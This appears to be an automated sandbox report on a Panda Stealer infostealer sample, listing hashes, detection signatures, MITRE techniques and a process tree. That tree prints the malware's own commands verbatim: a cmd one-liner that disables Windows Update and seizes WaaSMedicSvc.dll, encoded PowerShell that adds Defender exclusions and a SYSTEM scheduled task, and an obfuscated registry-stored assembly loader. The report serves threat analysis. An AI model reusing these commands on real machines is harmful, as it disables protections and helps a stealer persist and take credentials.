pandastealer | 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00

Analysis

max time kernel
16s
max time network
11s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
14-04-2024 17:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
Size

31.0MB
MD5

2a414765a282868d340c50552771afd9
SHA1

314b5d77f31a608d883967743bb9c7664bd3f109
SHA256

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
SHA512

51ef307b49077c05f3b1f8ce133d98653ab7f8d955ec2556b240b6262b0262cf6286315a4ba382478a67c993311098bf12f85004234e5316ec4975c122515dda
SSDEEP

786432:08zdak9FxZWQDktCxi7NRNRcr82SB+p2tEb1BqwnD58:0+19YQDkNRN6Z/Ym1HnD5

Score

10^/10

pandastealer discovery evasion exploit spyware stealer

Malware Config

Extracted

Family

pandastealer

Version

�u�#�gof��9b(�&�-֭��i�_g�m��L�q��ϯT�V�s��-�Y�ob�s�<�q��u z�D/?�َ��O;��d�gMɄ`xq@��k)��w�++�X��|>�M��f��dX��L�Or��f�C0�\1H�� ^ ��ߵ e')>}KmV��m��#�J��2E�!��N��O|Y=*ܖ��Q5^l��.��(��܉�A�sF�`��|��$Z%��dU3��c��c�!��.D煠c�_ >�sb�� a�Y

http://��9b(�&�-֭��i�_g�m��L�q��ϯT�V�s��-�Y�ob�s�<�q��u z�D/?�َ��O;��d�gMɄ`xq@��k)��w�++�X��|>�M��f��dX��L�Or��f�C0�\1H�� ^ ��ߵ e')>}KmV��m��#�J��2E�!��N��O|Y=*ܖ��Q5^l��.��(��܉�A�sF�`��|��$Z%��dU3��c��c�!��.D煠c�_ >�sb�� a�Y

Signatures

Panda Stealer payload 2 IoCs

resource	yara_rule
behavioral2/memory/3952-0-0x0000000000400000-0x00000000022FF000-memory.dmp	family_pandastealer
behavioral2/files/0x0008000000023458-63.dat	family_pandastealer

PandaStealer
Panda Stealer is a fork of CollectorProject Stealer written in C++.
stealer pandastealer

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3424	takeown.exe
3916	icacls.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	WCCNativeUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	driver_booster_setup.tmp

Executes dropped EXE 5 IoCs

pid	Process
1096	driver_booster_setup.exe
1952	lrucache.exe
3608	WCCNativeUpdate.exe
1748	driver_booster_setup.tmp
3184	setup.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3424	takeown.exe
3916	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3608 set thread context of 3940	3608	WCCNativeUpdate.exe	104

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4212	sc.exe
4944	sc.exe
3828	sc.exe
4728	sc.exe
3296	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry

T1112

pid	Process
4300	reg.exe
1556	reg.exe
5104	reg.exe
2752	reg.exe
3216	reg.exe
5092	reg.exe
3624	reg.exe
216	reg.exe
3172	reg.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1952	lrucache.exe
1952	lrucache.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
1748	driver_booster_setup.tmp
1748	driver_booster_setup.tmp
1748	driver_booster_setup.tmp
1748	driver_booster_setup.tmp
3184	setup.exe
3184	setup.exe
3608	WCCNativeUpdate.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	1748	driver_booster_setup.tmp
Token: SeDebugPrivilege	3608	WCCNativeUpdate.exe
Token: SeShutdownPrivilege	3284	powercfg.exe
Token: SeCreatePagefilePrivilege	3284	powercfg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3184	setup.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 3952 wrote to memory of 1096	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	90
PID 3952 wrote to memory of 1096	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	90
PID 3952 wrote to memory of 1096	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	90
PID 3952 wrote to memory of 1952	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	91
PID 3952 wrote to memory of 1952	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	91
PID 3952 wrote to memory of 1952	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	91
PID 3952 wrote to memory of 3608	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	92
PID 3952 wrote to memory of 3608	3952	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	92
PID 1096 wrote to memory of 1748	1096	driver_booster_setup.exe	93
PID 1096 wrote to memory of 1748	1096	driver_booster_setup.exe	93
PID 1096 wrote to memory of 1748	1096	driver_booster_setup.exe	93
PID 3608 wrote to memory of 3040	3608	WCCNativeUpdate.exe	94
PID 3608 wrote to memory of 3040	3608	WCCNativeUpdate.exe	94
PID 1748 wrote to memory of 3184	1748	driver_booster_setup.tmp	98
PID 1748 wrote to memory of 3184	1748	driver_booster_setup.tmp	98
PID 1748 wrote to memory of 3184	1748	driver_booster_setup.tmp	98
PID 3608 wrote to memory of 2464	3608	WCCNativeUpdate.exe	99
PID 3608 wrote to memory of 2464	3608	WCCNativeUpdate.exe	99
PID 3608 wrote to memory of 3364	3608	WCCNativeUpdate.exe	101
PID 3608 wrote to memory of 3364	3608	WCCNativeUpdate.exe	101
PID 2464 wrote to memory of 3296	2464	cmd.exe	103
PID 2464 wrote to memory of 3296	2464	cmd.exe	103
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3608 wrote to memory of 3940	3608	WCCNativeUpdate.exe	104
PID 3364 wrote to memory of 3284	3364	cmd.exe	105
PID 3364 wrote to memory of 3284	3364	cmd.exe	105
PID 2464 wrote to memory of 4212	2464	cmd.exe	106
PID 2464 wrote to memory of 4212	2464	cmd.exe	106

C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3952
- C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp" /SL5="$9017E,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1748
  - - C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:3184
- C:\Users\Admin\AppData\Local\Temp\lrucache.exe
  "C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3040
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2464
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3296
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4212
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:4944
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:3828
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:4728
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      4⤵
      Modifies registry key
      PID:2752
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      4⤵
      Modifies registry key
      PID:3216
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      4⤵
      Modifies registry key
      PID:216
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      4⤵
      Modifies registry key
      PID:5092
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      4⤵
      Modifies registry key
      PID:3624
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3424
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3916
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:4300
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:1556
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:5104
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:3172
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      4⤵
      PID:1208
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      4⤵
      PID:4460
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      4⤵
      PID:2356
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      4⤵
      PID:4064
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      4⤵
      PID:4800
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      4⤵
      PID:4336
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      4⤵
      PID:4328
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3364
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3284
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      PID:388
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      PID:2960
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      PID:808
- - C:\Windows\System32\conhost.exe
    C:\Windows\System32\conhost.exe
    3⤵
    PID:3940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAFkAQQBjAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAVQBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQgBjAEEARwA4AEEAYwBBAEIAbABBAEgASQBBAFkAUQBCAGMAQQBFAEUAQQBjAEEAQgB3AEEARQBRAEEAWQBRAEIAMABBAEcARQBBAFgAQQBCAE0AQQBHADgAQQBZAHcAQgBoAEEARwB3AEEAWABBAEIAVQBBAEcAVQBBAGIAUQBCAHcAQQBGAHcAQQBZAGcAQgBqAEEARABNAEEATwBRAEEAdwBBAEQASQBBAFoAQQBBADQAQQBEAEUAQQBNAHcAQQB5AEEARwBZAEEATgBBAEEAegBBAEcAVQBBAE0AdwBCAGgAQQBHAFUAQQBNAEEAQQA0AEEARABZAEEAWQBRAEEAdwBBAEQAQQBBAE8AUQBBADUAQQBEAGMAQQBPAFEAQgBtAEEARwBFAEEATwBBAEEANABBAEYAdwBBAFYAdwBCAEQAQQBFAE0AQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAFMAQQBCAHYAQQBIAE0AQQBkAEEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAZAB3AEIANQBBAEgARQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwBvAHMAdwBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAaAB5AGIAdgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGYAeQBjACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBEAEIAYQBzAHMAaQBzAHQAYQBuAHQAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBhAGQAZwBxACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVwBDAEMATgBhAHQAaQB2AGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAG8AcABlAHIAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgBjADMAOQAwADIAZAA4ADEAMwAyAGYANAAzAGUAMwBhAGUAMAA4ADYAYQAwADAAOQA5ADcAOQBmAGEAOAA4AFwAVwBDAEMATgBhAHQAaQB2AGUASABvAHMAdAAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBtAGMAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdQBkAG4AeQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARABCAGEAcwBzAGkAcwB0AGEAbgB0ACcAOwA="
    3⤵
    PID:4780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:5080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:1160

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0bfb6594-2045-438a-a5c3-bc91e2af0f2c}
1⤵
PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHYAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAG8AcABlAHIAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgBjADMAOQAwADIAZAA4ADEAMwAyAGYANAAzAGUAMwBhAGUAMAA4ADYAYQAwADAAOQA5ADcAOQBmAGEAOAA4AFwAVwBDAEMATgBhAHQAaQB2AGUASABvAHMAdAAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdwB5AHEAIwA+AA=="
1⤵
PID:3040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\IObit\iobitpromotion.ini

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1713116766\ENGLISH.lng

Filesize
24KB

MD5
8e7f2723f0e72bc6abefca738c9c1ca4

SHA1
969a4a6f31e146040a101d526886ede9a7c5c432

SHA256
f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b

SHA512
9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232

Download Submit
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

Filesize
2.7MB

MD5
0e31bfc197cf7557b6ba5c18ecb1e5b2

SHA1
78ec7c8f28568611cf524f30b67875e031a09cb2

SHA256
87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78

SHA512
